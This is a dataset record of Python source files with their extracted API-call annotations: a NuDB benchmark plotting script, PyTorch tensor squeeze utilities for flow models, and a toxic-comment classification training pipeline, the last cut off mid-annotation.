code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
#!/usr/bin/env python
# Script to read the result of the benchmark program and plot the results.
# Options:
# `-i arg` : input file (benchmark result)
# `-o arg` : html output for the plot
# Notes: After the script runs the plot will automatically be shown in a browser.
# Tested with python 3 only.
import argparse
import itertools
import collections
import pandas as pd
import matplotlib.pyplot as plt
import re
from bokeh.layouts import gridplot
from bokeh.palettes import Spectral11
from bokeh.plotting import figure, show, output_file
# Given a file at the start of a test result (on the header line)
# Return a data frame for the test result and leave the file one past
# the blank line at the end of the result
def to_data_frame(header, it):
    """Parse one whitespace-separated result table from the iterator ``it``.

    ``header`` supplies the column labels.  Rows are consumed from ``it``
    until a blank line (or end of input) is reached; every field is parsed
    as a float.  The first column becomes the index of the returned frame.

    Raises:
        Exception: if a row's field count does not match the header.
    """
    column_labels = re.split(' +', header.strip())
    columns = [[] for _ in column_labels]
    for line in it:
        line = line.strip()
        if not line:
            break
        fields = line.split()
        if len(fields) != len(columns):
            raise Exception('Bad file format, line: {}'.format(line))
        for column, field in zip(columns, fields):
            column.append(float(field))
    table = dict(zip(column_labels, columns))
    return pd.DataFrame(table, columns=column_labels[1:], index=columns[0])
def to_data_frames(f):
    """Read every benchmark result table from the file-like object ``f``.

    Each table is preceded by a trial label (which may span several lines)
    and starts at a header line that begins with whitespace.  Comment lines
    starting with '#' are skipped.

    Returns:
        dict mapping trial label -> pandas.DataFrame (built by
        ``to_data_frame``).
    """
    trial = ''
    result = {}
    for l in f:
        if l and l[0] == '#': continue
        if l and l[0] == ' ' and l.strip():
            if trial:
                # Remove anything in parens.  Raw string avoids the
                # invalid-escape-sequence DeprecationWarning that the
                # original non-raw pattern produced on Python 3.6+.
                trial = re.sub(r'\([^\)]*\)', '', trial)
                result[trial] = to_data_frame(l, f)
                trial = ''
            continue
        if trial: trial += ' ' # Handle multi-line labels
        trial += l.strip()
    return result
def bokeh_plot(title, df):
    """Build a bokeh figure plotting every column of ``df`` against its index.

    One line per column, coloured from the Spectral11 palette, with the
    column label used as the legend entry.
    """
    n_series = len(df.columns)
    colors = Spectral11[0:n_series]
    fig = figure(
        width=500,
        height=400,
        title=title,
        x_axis_label='DB Items',
        y_axis_label='Ops/Sec.')
    for idx in range(n_series):
        fig.line(
            x=df.index.values,
            y=df.iloc[:, idx],
            legend=df.columns[idx],
            line_color=colors[idx],
            line_width=5)
    return fig
def run_main(result_filename, plot_output):
    """Parse the benchmark result file and render all plots to ``plot_output``.

    Opens a browser window on the generated HTML file via ``show``.
    Returns the dict of parsed data frames (used by tests).
    """
    with open(result_filename) as f:
        dfd = to_data_frames(f)
    plots = [bokeh_plot(name, frame) for name, frame in dfd.items()]
    output_file(plot_output, title="NuDB Benchmark")
    show(gridplot(*plots, ncols=2, plot_width=500, plot_height=400))
    return dfd # for testing
def parse_args():
    """Build and evaluate the command-line parser for this script.

    Options: ``-i/--input`` (benchmark result file) and ``-o/--output``
    (HTML plot destination); both default to None when omitted.
    """
    parser = argparse.ArgumentParser(
        description=('Plot the benchmark results'))
    parser.add_argument('--input', '-i', help=('input'), )
    parser.add_argument('--output', '-o', help=('output'), )
    return parser.parse_args()
# Script entry point: read CLI options and plot the benchmark results.
if __name__ == '__main__':
    args = parse_args()
    if not args.input:
        print('No result file specified. Exiting')
    elif not args.output:
        print('No output file specified. Exiting')
    else:
        run_main(args.input, args.output)
| [
"bokeh.plotting.figure",
"argparse.ArgumentParser",
"bokeh.layouts.gridplot",
"pandas.DataFrame",
"re.sub",
"bokeh.plotting.output_file"
] | [((1218, 1278), 'pandas.DataFrame', 'pd.DataFrame', (['d'], {'columns': 'column_labels[1:]', 'index': 'columns[0]'}), '(d, columns=column_labels[1:], index=columns[0])\n', (1230, 1278), True, 'import pandas as pd\n'), ((1861, 1957), 'bokeh.plotting.figure', 'figure', ([], {'width': '(500)', 'height': '(400)', 'title': 'title', 'x_axis_label': '"""DB Items"""', 'y_axis_label': '"""Ops/Sec."""'}), "(width=500, height=400, title=title, x_axis_label='DB Items',\n y_axis_label='Ops/Sec.')\n", (1867, 1957), False, 'from bokeh.plotting import figure, show, output_file\n'), ((2640, 2705), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Plot the benchmark results"""'}), "(description='Plot the benchmark results')\n", (2663, 2705), False, 'import argparse\n'), ((2451, 2499), 'bokeh.plotting.output_file', 'output_file', (['plot_output'], {'title': '"""NuDB Benchmark"""'}), "(plot_output, title='NuDB Benchmark')\n", (2462, 2499), False, 'from bokeh.plotting import figure, show, output_file\n'), ((2513, 2571), 'bokeh.layouts.gridplot', 'gridplot', (['*plots'], {'ncols': '(2)', 'plot_width': '(500)', 'plot_height': '(400)'}), '(*plots, ncols=2, plot_width=500, plot_height=400)\n', (2521, 2571), False, 'from bokeh.layouts import gridplot\n'), ((1524, 1558), 're.sub', 're.sub', (['"""\\\\([^\\\\)]*\\\\)"""', '""""""', 'trial'], {}), "('\\\\([^\\\\)]*\\\\)', '', trial)\n", (1530, 1558), False, 'import re\n')] |
import torch
import torch.nn as nn
def channel_split(z, dim=1, odd=False):
    """Split ``z`` into two equal halves along ``dim``.

    With ``odd=True`` the halves are returned in swapped order.
    """
    half = z.size(dim) // 2
    first, second = torch.split(z, half, dim=dim)
    if odd:
        return second, first
    return first, second
def channel_merge(z0, z1, dim=1, odd=False):
    """Concatenate the halves produced by ``channel_split`` along ``dim``.

    With ``odd=True`` the halves are swapped before concatenation, mirroring
    the swap done by ``channel_split(..., odd=True)``.
    """
    parts = [z1, z0] if odd else [z0, z1]
    return torch.cat(parts, dim=dim)
def get_checker_mask(H, W, odd=False, device=None):
    """Return a (1, 1, H, W) float checkerboard mask of zeros and ones.

    With ``odd=False`` cells where (row + col) is odd are 1; ``odd=True``
    inverts the pattern.
    """
    rows = torch.arange(H).to(device).long()
    cols = torch.arange(W).to(device).long()
    rows, cols = torch.meshgrid([rows, cols])
    parity = 0 if odd else 1
    checker = ((rows + cols) % 2 == parity).float()
    return checker.view(1, 1, H, W)
def checker_split(z, odd=False):
    """Split a (B, C, H, W) map into two (B, 2C, H/2, W/2) halves.

    The map is squeezed 2x2, the four sub-grids are regrouped so that the
    two diagonal sub-grids form one half and the two anti-diagonal
    sub-grids the other.  ``odd=True`` swaps the returned halves.
    """
    assert z.dim() == 4
    B, C, H, W = z.size()
    sub = z.view(B, C, H // 2, 2, W // 2, 2)          # (B, C, sH, 2, sW, 2)
    sub = sub.permute(0, 1, 3, 5, 2, 4).contiguous()  # (B, C, 2, 2, sH, sW)
    sub = sub.view(B, C * 4, H // 2, W // 2)          # (B, C * 4, sH, sW)
    za, zb, zc, zd = torch.split(sub, C, dim=1)
    diag = torch.cat([za, zd], dim=1)
    anti = torch.cat([zb, zc], dim=1)
    return (anti, diag) if odd else (diag, anti)
def checker_merge(z0, z1, odd=False):
    """Inverse of ``checker_split``: rebuild the (B, C, H, W) feature map.

    ``odd`` must match the flag that was used for the split.
    """
    assert z0.dim() == 4 and z1.dim() == 4
    B, C2, sH, sW = z0.size()
    C = C2 // 2
    if odd:
        z0, z1 = z1, z0
    za, zd = torch.split(z0, C, dim=1)
    zb, zc = torch.split(z1, C, dim=1)
    merged = torch.cat([za, zb, zc, zd], dim=1)
    merged = merged.view(B, C, 2, 2, sH, sW).permute(0, 1, 4, 2, 5, 3).contiguous()
    return merged.view(B, C, sH * 2, sW * 2)
def squeeze1d(z, odd=False):
    """Deinterleave a (B, C) tensor into its even and odd entries.

    Returns two (B, C/2) tensors; ``odd=True`` swaps them.
    """
    assert z.dim() == 2
    B, C = z.size()
    pairs = z.view(B, C // 2, 2)
    evens = pairs[:, :, 0]
    odds = pairs[:, :, 1]
    return (odds, evens) if odd else (evens, odds)
def unsqueeze1d(z0, z1, odd=False):
    """Interleave two (B, C/2) tensors back into one (B, C) tensor.

    Inverse of ``squeeze1d``; ``odd`` must match the flag used there.
    """
    assert z0.dim() == 2 and z1.dim() == 2
    B = z0.size(0)
    if odd:
        z0, z1 = z1, z0
    interleaved = torch.stack([z0, z1], dim=-1)
    return interleaved.view(B, -1).contiguous()
def squeeze2d(z, odd=False):
    """Squeeze a (B, C, H, W) map 2x2 and split the result channel-wise.

    Returns two (B, 2C, H/2, W/2) halves; ``odd=True`` swaps them.
    """
    assert z.dim() == 4
    B, C, H, W = z.size()
    sub = z.view(B, C, H // 2, 2, W // 2, 2)          # (B, C, sH, 2, sW, 2)
    sub = sub.permute(0, 1, 3, 5, 2, 4).contiguous()  # (B, C, 2, 2, sH, sW)
    sub = sub.view(B, C * 4, H // 2, W // 2)          # (B, C * 4, sH, sW)
    first, second = torch.split(sub, C * 2, dim=1)
    return (second, first) if odd else (first, second)
def unsqueeze2d(z0, z1, odd=False):
    """Inverse of ``squeeze2d``: rebuild the (B, C, H, W) feature map.

    ``odd`` must match the flag that was used for the squeeze.
    """
    assert z0.dim() == 4 and z1.dim() == 4
    B, C2, sH, sW = z0.size()
    C = C2 // 2
    if odd:
        z0, z1 = z1, z0
    full = torch.cat([z0, z1], dim=1)
    full = full.view(B, C, 2, 2, sH, sW).permute(0, 1, 4, 2, 5, 3).contiguous()
    return full.view(B, C, sH * 2, sW * 2)
class Squeeze1d(nn.Module):
    """Flow layer that deinterleaves a 1D vector into two concatenated halves.

    The transform only permutes entries, so the running log-determinant
    ``log_df_dz`` is passed through unchanged in both directions.
    """
    def __init__(self, odd=False):
        super(Squeeze1d, self).__init__()
        self.odd = odd

    def forward(self, z, log_df_dz):
        half_a, half_b = squeeze1d(z, self.odd)
        return torch.cat([half_a, half_b], dim=1), log_df_dz

    def backward(self, z, log_df_dz):
        half_a, half_b = torch.split(z, z.size(1) // 2, dim=1)
        return unsqueeze1d(half_a, half_b, self.odd), log_df_dz
class Unsqueeze1d(nn.Module):
    """Inverse flow layer of ``Squeeze1d``: re-interleaves the two halves.

    Pure permutation, so ``log_df_dz`` is passed through unchanged.
    """
    def __init__(self, odd=False):
        super(Unsqueeze1d, self).__init__()
        self.odd = odd

    def forward(self, z, log_df_dz):
        half_a, half_b = torch.split(z, z.size(1) // 2, dim=1)
        return unsqueeze1d(half_a, half_b, self.odd), log_df_dz

    def backward(self, z, log_df_dz):
        half_a, half_b = squeeze1d(z, self.odd)
        return torch.cat([half_a, half_b], dim=1), log_df_dz
class Squeeze2d(nn.Module):
    """Flow layer that squeezes a 2D feature map and concatenates the halves
    along the channel axis.

    The transform only rearranges entries, so ``log_df_dz`` is passed
    through unchanged in both directions.
    """
    def __init__(self, odd=False):
        super(Squeeze2d, self).__init__()
        self.odd = odd

    def forward(self, z, log_df_dz):
        half_a, half_b = squeeze2d(z, self.odd)
        return torch.cat([half_a, half_b], dim=1), log_df_dz

    def backward(self, z, log_df_dz):
        half_a, half_b = torch.split(z, z.size(1) // 2, dim=1)
        return unsqueeze2d(half_a, half_b, self.odd), log_df_dz
class Unsqueeze2d(nn.Module):
    """Inverse flow layer of ``Squeeze2d``: merges the two channel halves
    back into the original feature map.

    Pure rearrangement, so ``log_df_dz`` is passed through unchanged.
    """
    def __init__(self, odd=False):
        super(Unsqueeze2d, self).__init__()
        self.odd = odd

    def forward(self, z, log_df_dz):
        half_a, half_b = torch.split(z, z.size(1) // 2, dim=1)
        return unsqueeze2d(half_a, half_b, self.odd), log_df_dz

    def backward(self, z, log_df_dz):
        half_a, half_b = squeeze2d(z, self.odd)
        return torch.cat([half_a, half_b], dim=1), log_df_dz
| [
"torch.split",
"torch.stack",
"torch.cat",
"torch.meshgrid",
"torch.arange"
] | [((110, 141), 'torch.split', 'torch.split', (['z', '(C // 2)'], {'dim': 'dim'}), '(z, C // 2, dim=dim)\n', (121, 141), False, 'import torch\n'), ((287, 315), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': 'dim'}), '([z0, z1], dim=dim)\n', (296, 315), False, 'import torch\n'), ((482, 506), 'torch.meshgrid', 'torch.meshgrid', (['[iy, ix]'], {}), '([iy, ix])\n', (496, 506), False, 'import torch\n'), ((936, 960), 'torch.split', 'torch.split', (['z', 'C'], {'dim': '(1)'}), '(z, C, dim=1)\n', (947, 960), False, 'import torch\n'), ((970, 996), 'torch.cat', 'torch.cat', (['[za, zd]'], {'dim': '(1)'}), '([za, zd], dim=1)\n', (979, 996), False, 'import torch\n'), ((1006, 1032), 'torch.cat', 'torch.cat', (['[zb, zc]'], {'dim': '(1)'}), '([zb, zc], dim=1)\n', (1015, 1032), False, 'import torch\n'), ((1267, 1292), 'torch.split', 'torch.split', (['z0', 'C'], {'dim': '(1)'}), '(z0, C, dim=1)\n', (1278, 1292), False, 'import torch\n'), ((1306, 1331), 'torch.split', 'torch.split', (['z1', 'C'], {'dim': '(1)'}), '(z1, C, dim=1)\n', (1317, 1331), False, 'import torch\n'), ((1340, 1374), 'torch.cat', 'torch.cat', (['[za, zb, zc, zd]'], {'dim': '(1)'}), '([za, zb, zc, zd], dim=1)\n', (1349, 1374), False, 'import torch\n'), ((1846, 1875), 'torch.stack', 'torch.stack', (['[z0, z1]'], {'dim': '(-1)'}), '([z0, z1], dim=-1)\n', (1857, 1875), False, 'import torch\n'), ((2222, 2250), 'torch.split', 'torch.split', (['z', '(C * 2)'], {'dim': '(1)'}), '(z, C * 2, dim=1)\n', (2233, 2250), False, 'import torch\n'), ((2478, 2504), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), '([z0, z1], dim=1)\n', (2487, 2504), False, 'import torch\n'), ((2953, 2979), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), '([z0, z1], dim=1)\n', (2962, 2979), False, 'import torch\n'), ((3616, 3642), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), '([z0, z1], dim=1)\n', (3625, 3642), False, 'import torch\n'), ((4001, 4027), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), 
'([z0, z1], dim=1)\n', (4010, 4027), False, 'import torch\n'), ((4673, 4699), 'torch.cat', 'torch.cat', (['[z0, z1]'], {'dim': '(1)'}), '([z0, z1], dim=1)\n', (4682, 4699), False, 'import torch\n'), ((392, 407), 'torch.arange', 'torch.arange', (['W'], {}), '(W)\n', (404, 407), False, 'import torch\n'), ((435, 450), 'torch.arange', 'torch.arange', (['H'], {}), '(H)\n', (447, 450), False, 'import torch\n')] |
from __future__ import absolute_import
import os.path
import argparse
import logging
import json
from six import iteritems
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.externals import joblib
from keras.models import load_model
from tensorflow.python.client import device_lib
from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity
from features import catboost_features
from preprocessing import clean_text, convert_text2seq, split_data, parse_seq
from models import cnn, dense, rnn, TFIDF, CatBoost, save_predictions
from train import train
from metrics import get_metrics, print_metrics
def get_kwargs(kwargs):
    """Populate ``kwargs`` in place with the parsed command-line options.

    Every option of the training pipeline (input/output paths, embeddings,
    mode, preprocessing switches, etc.) is added to the given dict, so the
    caller can treat CLI options and programmatic overrides uniformly.
    """
    parser = argparse.ArgumentParser(description='-f TRAIN_FILE -t TEST_FILE -o OUTPUT_FILE -e EMBEDS_FILE [-l LOGGER_FILE] [--swear-words SWEAR_FILE] [--wrong-words WRONG_WORDS_FILE] [--format-embeds FALSE]')
    parser.add_argument('-f', '--train', dest='train', action='store', help='/path/to/trian_file', type=str)
    parser.add_argument('-t', '--test', dest='test', action='store', help='/path/to/test_file', type=str)
    parser.add_argument('-o', '--output', dest='output', action='store', help='/path/to/output_file', type=str)
    parser.add_argument('-we', '--word_embeds', dest='word_embeds', action='store', help='/path/to/embeds_file', type=str)
    parser.add_argument('-ce', '--char_embeds', dest='char_embeds', action='store', help='/path/to/embeds_file', type=str)
    parser.add_argument('-c','--config', dest='config', action='store', help='/path/to/config.json', type=str)
    parser.add_argument('-l', '--logger', dest='logger', action='store', help='/path/to/log_file', type=str, default=None)
    parser.add_argument('--mode', dest='mode', action='store', help='preprocess / train / validate / all', type=str, default='all')
    parser.add_argument('--max-words', dest='max_words', action='store', type=int, default=300000)
    parser.add_argument('--use-only-exists-words', dest='use_only_exists_words', action='store_true')
    parser.add_argument('--swear-words', dest='swear_words', action='store', help='/path/to/swear_words_file', type=str, default=None)
    parser.add_argument('--wrong-words', dest='wrong_words', action='store', help='/path/to/wrong_words_file', type=str, default=None)
    parser.add_argument('--format-embeds', dest='format_embeds', action='store', help='file | json | pickle | binary', type=str, default='raw')
    parser.add_argument('--output-dir', dest='output_dir', action='store', help='/path/to/dir', type=str, default='.')
    parser.add_argument('--norm-prob', dest='norm_prob', action='store_true')
    parser.add_argument('--norm-prob-koef', dest='norm_prob_koef', action='store', type=float, default=1)
    parser.add_argument('--gpus', dest='gpus', action='store', help='count GPUs', type=int, default=0)
    # vars() + update works on both Python 2 and 3 — no need for six.iteritems.
    kwargs.update(vars(parser.parse_args()))
def main(*kargs, **kwargs):
    """Run the toxic-comment classification pipeline end to end.

    Stages (selected by ``--mode``): text cleaning and sequence encoding
    ('preprocess'), per-model training ('train'), validation metrics
    ('validate'), and finally a CatBoost meta-model blended over the base
    predictions plus submission output ('all').  All file locations and
    hyper-parameters come from the CLI via ``get_kwargs``.

    Fixes over the original: the model-alias fallback referenced an
    undefined ``i``; ``model_alias`` was only assigned in the NN branch but
    used by every branch; and the meta-model input referenced the
    not-yet-defined ``x_train_meta``.
    """
    get_kwargs(kwargs)
    train_fname = kwargs['train']
    test_fname = kwargs['test']
    result_fname = kwargs['output']
    word_embeds_fname = kwargs['word_embeds']
    char_embeds_fname = kwargs['char_embeds']
    logger_fname = kwargs['logger']
    mode = kwargs['mode']
    max_words = kwargs['max_words']
    use_only_exists_words = kwargs['use_only_exists_words']
    swear_words_fname = kwargs['swear_words']
    wrong_words_fname = kwargs['wrong_words']
    embeds_format = kwargs['format_embeds']
    config = kwargs['config']
    output_dir = kwargs['output_dir']
    norm_prob = kwargs['norm_prob']
    norm_prob_koef = kwargs['norm_prob_koef']
    gpus = kwargs['gpus']

    # Column names encode the preprocessing options so cached CSVs built
    # with different settings do not collide.
    seq_col_name_words = 'comment_seq_lw_use_exist{}_{}k'.format(int(use_only_exists_words), int(max_words/1000))
    seq_col_name_ll3 = 'comment_seq_ll3_use_exist{}_{}k'.format(int(use_only_exists_words), int(max_words/1000))

    model_file = {
        'dense': os.path.join(output_dir, 'dense.h5'),
        'cnn': os.path.join(output_dir, 'cnn.h5'),
        'lstm': os.path.join(output_dir, 'lstm.h5'),
        'lr': os.path.join(output_dir, '{}_logreg.bin'),
        'catboost': os.path.join(output_dir, '{}_catboost.bin')
    }

    # ====Create logger====
    logger = Logger(logging.getLogger(), logger_fname)

    # ====Detect GPUs====
    logger.debug(device_lib.list_local_devices())

    # ====Load data====
    logger.info('Loading data...')
    train_df = load_data(train_fname)
    test_df = load_data(test_fname)

    target_labels = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
    num_classes = len(target_labels)

    # ====Load additional data====
    logger.info('Loading additional data...')
    swear_words = load_data(swear_words_fname, func=lambda x: set(x.T[0]), header=None)
    wrong_words_dict = load_data(wrong_words_fname, func=lambda x: {val[0] : val[1] for val in x})

    # ====Load word vectors====
    logger.info('Loading embeddings...')
    embeds_word = Embeds().load(word_embeds_fname, embeds_format)
    embeds_ll3 = Embeds().load(char_embeds_fname, embeds_format)

    # ====Clean texts====
    if mode in ('preprocess', 'all'):
        logger.info('Cleaning text...')
        train_df['comment_text_clear'] = clean_text(train_df['comment_text'], wrong_words_dict, autocorrect=True)
        test_df['comment_text_clear'] = clean_text(test_df['comment_text'], wrong_words_dict, autocorrect=True)
        train_df.to_csv(os.path.join(output_dir, 'train_clear.csv'), index=False)
        test_df.to_csv(os.path.join(output_dir, 'test_clear.csv'), index=False)

    # ====Calculate maximum seq length====
    logger.info('Calc text length...')
    train_df.fillna('__NA__', inplace=True)
    test_df.fillna('__NA__', inplace=True)
    train_df['text_len'] = train_df['comment_text_clear'].apply(lambda words: len(words.split()))
    test_df['text_len'] = test_df['comment_text_clear'].apply(lambda words: len(words.split()))
    # Mean + 3 std covers nearly all comments without padding to the longest outlier.
    max_seq_len = np.round(train_df['text_len'].mean() + 3*train_df['text_len'].std()).astype(int)
    max_char_seq_len = 2000 # empirical
    logger.debug('Max seq length = {}'.format(max_seq_len))

    # ====Prepare data to NN====
    logger.info('Converting texts to sequences...')
    if mode in ('preprocess', 'all'):
        train_df[seq_col_name_words], test_df[seq_col_name_words], word_index, train_df[seq_col_name_ll3], test_df[seq_col_name_ll3], ll3_index = convert_text2seq(
            train_df['comment_text_clear'].tolist(),
            test_df['comment_text_clear'].tolist(),
            max_words,
            max_seq_len,
            max_char_seq_len,
            embeds_word,
            lower=True,
            oov_token='__<PASSWORD>',
            uniq=False,
            use_only_exists_words=use_only_exists_words)
        logger.debug('Dictionary size use_exist{} = {}'.format(int(use_only_exists_words), len(word_index)))
        logger.debug('Char dict size use_exist{} = {}'.format(int(use_only_exists_words), len(ll3_index)))

        logger.info('Preparing embedding matrix...')
        words_not_found = embeds_word.set_matrix(max_words, word_index)
        # Char-trigram embeddings are randomly initialised with the same
        # width as the word embeddings.
        embeds_ll3.matrix = np.random.normal(size=(len(ll3_index), embeds_word.shape[1]))
        embeds_ll3.word_index = ll3_index
        embeds_ll3.word_index_reverse = {val: key for key, val in ll3_index.items()}
        embeds_ll3.shape = np.shape(embeds_ll3.matrix)
        embeds_word.save(os.path.join(output_dir, 'wiki.embeds_lw.{}k'.format(int(max_words/1000))))
        embeds_ll3.save(os.path.join(output_dir, 'wiki.embeds_ll3.{}k'.format(int(max_words/1000))))

        # ====Get text vector====
        pooling = {
            'max': {'func': np.max},
            'avg': {'func': np.sum, 'normalize': True},
            'sum': {'func': np.sum, 'normalize': False}
        }
        for p in ['max', 'avg', 'sum']:
            train_df['comment_vec_{}'.format(p)] = train_df[seq_col_name_words].apply(lambda x: embed_aggregate(x, embeds_word, **pooling[p]))
            test_df['comment_vec_{}'.format(p)] = test_df[seq_col_name_words].apply(lambda x: embed_aggregate(x, embeds_word, **pooling[p]))
        train_df.to_csv(os.path.join(output_dir, 'train_clear1.csv'), index=False)
        test_df.to_csv(os.path.join(output_dir, 'test_clear1.csv'), index=False)
    else:
        # Cached CSVs store sequences/vectors as strings; parse them back.
        for col in train_df.columns:
            if col.startswith('comment_seq'):
                train_df[col] = train_df[col].apply(lambda x: parse_seq(x, int))
                test_df[col] = test_df[col].apply(lambda x: parse_seq(x, int))
            elif col.startswith('comment_vec'):
                train_df[col] = train_df[col].apply(lambda x: parse_seq(x, float))
                test_df[col] = test_df[col].apply(lambda x: parse_seq(x, float))

    logger.debug('Embedding matrix shape = {}'.format(embeds_word.shape))
    logger.debug('Number of null word embeddings = {}'.format(np.sum(np.sum(embeds_word.matrix, axis=1) == 0)))

    # ====END OF `PREPROCESS`====
    if mode == 'preprocess':
        return True

    # ====Train/test split data====
    x = np.array(train_df[seq_col_name_words].values.tolist())
    y = np.array(train_df[target_labels].values.tolist())
    x_train_nn, x_val_nn, y_train, y_val, train_idxs, val_idxs = split_data(x, y, test_size=0.2, shuffle=True, random_state=42)
    x_test_nn = np.array(test_df[seq_col_name_words].values.tolist())

    x_char = np.array(train_df[seq_col_name_ll3].values.tolist())
    x_char_train_nn = x_char[train_idxs]
    x_char_val_nn = x_char[val_idxs]
    x_char_test_nn = np.array(test_df[seq_col_name_ll3].values.tolist())

    x_train_tfidf = train_df['comment_text_clear'].values[train_idxs]
    x_val_tfidf = train_df['comment_text_clear'].values[val_idxs]
    x_test_tfidf = test_df['comment_text_clear'].values

    catboost_cols = catboost_features(train_df, test_df)
    x_train_cb = train_df[catboost_cols].values[train_idxs].T
    x_val_cb = train_df[catboost_cols].values[val_idxs].T
    x_test_cb = test_df[catboost_cols].values.T

    # ====Train models====
    nn_models = {
        'cnn': cnn,
        'dense': dense,
        'rnn': rnn
    }
    params = Params(config)
    metrics = {}
    predictions = {}
    # enumerate() fixes the previously undefined `i` in the alias fallback.
    for i, param in enumerate(params['models']):
        for model_label, model_params in param.items():
            # Resolve the alias up front so every branch (and the shared
            # metrics/save code below) can use it.
            model_alias = model_params.get('common', {}).get('alias', None)
            if model_alias is None or not model_alias:
                model_alias = '{}_{}'.format(model_label, i)
            if model_params.get('common', {}).get('warm_start', False) and os.path.exists(model_params.get('common', {}).get('model_file', '')):
                logger.info('{} warm starting...'.format(model_label))
                model = load_model(model_params.get('common', {}).get('model_file', None))
            elif model_label in nn_models:
                model = nn_models[model_label](
                    embeds_word.matrix,
                    embeds_ll3.matrix,
                    num_classes,
                    max_seq_len,
                    max_char_seq_len,
                    gpus=gpus,
                    **model_params['init'])
                logger.info("training {} ...".format(model_label))
                if model_label == 'dense':
                    # The dense model consumes word- and char-level inputs.
                    x_tr = [x_train_nn, x_char_train_nn]
                    x_val = [x_val_nn, x_char_val_nn]
                    x_test = [x_test_nn, x_char_test_nn]
                else:
                    x_tr = x_train_nn
                    x_val = x_val_nn
                    x_test = x_test_nn
                hist = train(x_tr,
                             y_train,
                             model,
                             logger=logger,
                             **model_params['train'])
                predictions[model_alias] = model.predict(x_val)
                save_predictions(test_df, model.predict(x_test), target_labels, model_alias)
            elif model_label == 'tfidf':
                model = TFIDF(target_labels, **model_params['init'])
                model.fit(x_train_tfidf, y_train, **model_params['train'])
                predictions[model_alias] = model.predict(x_val_tfidf)
                save_predictions(test_df, model.predict(x_test_tfidf), target_labels, model_alias)
            elif model_label == 'catboost':
                model = CatBoost(target_labels, **model_params['init'])
                model.fit(x_train_cb, y_train, eval_set=(x_val_cb, y_val), use_best_model=True)
                predictions[model_alias] = model.predict_proba(x_val_cb)
                save_predictions(test_df, model.predict_proba(x_test_cb), target_labels, model_alias)
            # NOTE(review): a warm-started model is loaded but never predicts,
            # so predictions[model_alias] may be missing here — confirm the
            # intended warm-start flow.
            metrics[model_alias] = get_metrics(y_val, predictions[model_alias], target_labels)
            logger.debug('{} params:\n{}'.format(model_alias, model_params))
            logger.debug('{} metrics:\n{}'.format(model_alias, print_metrics(metrics[model_alias])))
            model.save(os.path.join(output_dir, model_params['common']['model_file']))

    logger.info('Saving metrics...')
    with open(os.path.join(output_dir, 'metrics.json'), 'w') as f:
        f.write(json.dumps(metrics))

    # ====END OF `VALIDATE`====
    if mode == 'validate':
        return True

    # ====Meta catboost====
    logger.info('training catboost as metamodel...')
    x_meta = [predictions[model_alias] for model_alias in sorted(predictions.keys())]
    # Fix: the original referenced the not-yet-defined `x_train_meta` here.
    x_meta = np.array(x_meta).T
    x_train_meta, x_val_meta, y_train_meta, y_val_meta = train_test_split(x_meta, y_val, test_size=0.20, random_state=42)
    meta_model = CatBoost(target_labels,
                       loss_function='Logloss',
                       iterations=1000,
                       depth=6,
                       learning_rate=0.03,
                       rsm=1
                       )
    meta_model.fit(x_train_meta, y_train_meta, eval_set=(x_val_meta, y_val_meta), use_best_model=True)
    y_hat_meta = meta_model.predict_proba(x_val_meta)
    metrics_meta = get_metrics(y_val_meta, y_hat_meta, target_labels)
    #model.save(os.path.join(output_dir, 'meta.catboost')
    logger.debug('{} metrics:\n{}'.format('META', print_metrics(metrics_meta)))

    # ====Predict====
    logger.info('Applying models...')
    test_cols = []
    for model_alias in sorted(predictions.keys()):
        for label in target_labels:
            test_cols.append('{}_{}'.format(model_alias, label))
    x_test = test_df[test_cols].values
    preds = meta_model.predict_proba(x_test)
    for i, label in enumerate(target_labels):
        test_df[label] = preds[:, i]

    # ====Normalize probabilities====
    if norm_prob:
        for label in target_labels:
            test_df[label] = norm_prob_koef * test_df[label]

    # ====Save results====
    logger.info('Saving results...')
    test_df[['id', 'toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']].to_csv(result_fname, index=False, header=True)
    test_df.to_csv('{}_tmp'.format(result_fname), index=False, header=True)
# Script entry point: build kwargs from the CLI and run the full pipeline.
if __name__=='__main__':
    main()
| [
"preprocessing.split_data",
"logging.getLogger",
"tensorflow.python.client.device_lib.list_local_devices",
"utils.load_data",
"numpy.array",
"models.CatBoost",
"preprocessing.clean_text",
"argparse.ArgumentParser",
"json.dumps",
"metrics.get_metrics",
"features.catboost_features",
"utils.embed... | [((697, 903), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""-f TRAIN_FILE -t TEST_FILE -o OUTPUT_FILE -e EMBEDS_FILE [-l LOGGER_FILE] [--swear-words SWEAR_FILE] [--wrong-words WRONG_WORDS_FILE] [--format-embeds FALSE]"""'}), "(description=\n '-f TRAIN_FILE -t TEST_FILE -o OUTPUT_FILE -e EMBEDS_FILE [-l LOGGER_FILE] [--swear-words SWEAR_FILE] [--wrong-words WRONG_WORDS_FILE] [--format-embeds FALSE]'\n )\n", (720, 903), False, 'import argparse\n'), ((4432, 4454), 'utils.load_data', 'load_data', (['train_fname'], {}), '(train_fname)\n', (4441, 4454), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((4469, 4490), 'utils.load_data', 'load_data', (['test_fname'], {}), '(test_fname)\n', (4478, 4490), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((4817, 4891), 'utils.load_data', 'load_data', (['wrong_words_fname'], {'func': '(lambda x: {val[0]: val[1] for val in x})'}), '(wrong_words_fname, func=lambda x: {val[0]: val[1] for val in x})\n', (4826, 4891), False, 'from utils import load_data, Embeds, Logger, Params, embed_aggregate, similarity\n'), ((9974, 10036), 'preprocessing.split_data', 'split_data', (['x', 'y'], {'test_size': '(0.2)', 'shuffle': '(True)', 'random_state': '(42)'}), '(x, y, test_size=0.2, shuffle=True, random_state=42)\n', (9984, 10036), False, 'from preprocessing import clean_text, 